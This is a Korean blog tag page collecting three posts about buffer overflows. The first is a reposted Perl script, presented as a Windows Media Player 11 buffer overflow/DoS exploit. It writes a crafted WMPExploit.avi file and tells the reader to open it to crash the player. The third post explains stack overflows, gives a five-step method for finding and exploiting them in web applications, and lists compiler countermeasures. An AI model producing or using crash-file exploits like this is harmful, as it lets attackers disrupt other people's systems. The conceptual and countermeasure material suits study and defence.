'Buffer Overflow'에 해당되는 글 3건

  1. 2011.04.02 Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit by CEOinIRVINE 2
  2. 2008.12.18 Buffer Overflow by CEOinIRVINE
  3. 2008.10.03 Buffer Overflows by CEOinIRVINE

Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit

Hacking 2011. 4. 2. 07:48
#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software  : Windows Media player
#(+)Version   : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
                                                                   
(+)Exploit Title:  Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
 
       
(+) Software  : Windows Media player
(+) Version   : 11.0.5721.5145                                   
(+) Tested On : WIN-XP SP3                                               
(+) Date      : 31.03.2011                                               
(+) Hour      : 13:37 PM                                                   
____________________________________________________________________\n    ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");

'Hacking' 카테고리의 다른 글

Firewall DoS Attacks  (0) 2011.07.28
IP Spoofing  (1) 2011.07.28
Antivirus and Security software coupons  (0) 2011.03.26
2011 Malware Trends  (0) 2011.03.26
Top Ten Antivirus 2012  (1) 2011.03.26
Posted by CEOinIRVINE
l

Buffer Overflow

Hacking 2008. 12. 18. 01:28

'Hacking' 카테고리의 다른 글

Microsoft Internet Explorer Data Binding Vulnerability  (0) 2008.12.18
PE Format Analysys  (0) 2008.12.18
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities  (0) 2008.12.17
Getting Started Reverse Engineering  (0) 2008.12.16
Problems with Penetration Testing  (0) 2008.12.08
Posted by CEOinIRVINE
l

Buffer Overflows

Hacking 2008. 10. 3. 07:19

Buffer overflows are one of the more complex injection attacks, as they take advantage of developers misusing memory. Like command injection, a successful buffer overflow attack gives the attacker complete control of the remote machine.

Note 

This section is intended to give you a feel for buffer overflows, but it does not discuss buffer overflows in technical detail. You can consult other texts and articles such as Aleph One’s classic “Smashing The Stack For Fun And Profit” in Phrack magazine (www.phrack.org/archives/49/P49-14) for more information on buffer overflows.

Some programming languages, such as C and C++, place memory management responsibilities on the developer. If the developer is not careful, user input could write to memory that was not intended to be written to. One such memory location is called the return address of a stack. The return address holds the memory address of the next machine instruction block to execute. If an application is vulnerable to buffer overflows, an attacker could send a very long string to the web application—longer than the developer expected. The string could potentially overwrite the return address, telling the web application what machine instructions it should execute next. The injection aspect of buffer overflows is that the attacker injects machine instructions (called shell code) into some user input. The attacker somewhat needs to know where the shell code will end up in the memory of the computer running the web application. Then the attacker overwrites the return address to point to the memory location of the shell code.

Exploiting buffer overflows are nontrivial, but finding them is not as difficult, and finding buffer overflows on a local machine is easy. You need only send very long strings in all user inputs. We suggest inputting predictable strings, such as 10,000 capital As, into each input. If the program crashes, it is most likely due to a buffer overflow. Repeat the crash while running the application in a debugger. When the program crashes, investigate the program registers. If you see 41414141 (41 is the ASCII representation of a capital A) in the SP register, you have found a buffer overflow.

Finding buffer overflows on remote machines, such as a web application, is a lot more difficult, because attackers cannot view the contents of the web application’s registers, and it may even be difficult to recognize that the web application has even crashed. The trick to finding buffer overflows on web applications is to do the following:

  1. Identify what publicly available libraries or code the web application is running.

  2. Download that code.

  3. Test that code on your local machine to find a buffer overflow.

  4. Develop exploit code that works on your local machine.

  5. Attempt to execute the exploit code on the web application.

Countermeasure Preventing Buffer Overflows

The easiest step is to avoid developing frontend web applications with C and C++. The speed increase is nominal compared to delays in Internet communication. If you must use code written in C or C++, minimize the amount of code used and perform sanity checks on user input before sending it onto the C or C++ derived code.

If you can’t avoid programming in C or C++, you can take basic steps to prevent some buffer overflows, such as compiling your code with stack protection. You can, for example, use the /GS flag when compiling C and C++ code in Visual Studio, and use –fstack-protector in SSP (also known as ProPolice)-enabled versions of gcc.

'Hacking' 카테고리의 다른 글

Reverse Engineering Tutoring 1  (0) 2008.10.04
Testing Injection Exposures  (0) 2008.10.03
LDAP Injection  (0) 2008.10.03
XXE (XML eXternal Entity) Attacks  (0) 2008.10.03
Directory Traversal Attacks  (0) 2008.10.03
Posted by CEOinIRVINE
l
◀ 이전페이지 1 다음페이지 ▶
블로그 이미지
Information Security & US & Life & Love & Fashion & Hacking & Passion hack, web security, game security, game hack, fps, ava, wow, starcraft II, soldier front, gunz, reverse engineering, SQL injection, XSS, hacking, penetration testings, IT, internet technlogoy, security, penetratoin testing, XSS, XSRF CEOinIRVINE

최근에 올라온 글

공지사항

카테고리

CEOinIRVINE (2282)
Editorials (4)
Finance & EMBA (1)
Fashion (239)
IT (215)
Hacking (266)
Online Game (17)
Vocabulary (14)
iLoveBlackberry (2)
Business (1108)
Politics (165)
US News (115)
World News (63)
Career Consulting (8)
Apple (5)
Car (13)
Travel (5)
Irvine (3)
Sports (3)
recipe (1)
Music (15)
TVs (11)
Spanish (1)
Cyber Law (1)
Perl (3)
Java (1)
Artificial Intelligence (1)
Stock (1)

태그목록

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

링크

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

티스토리툴바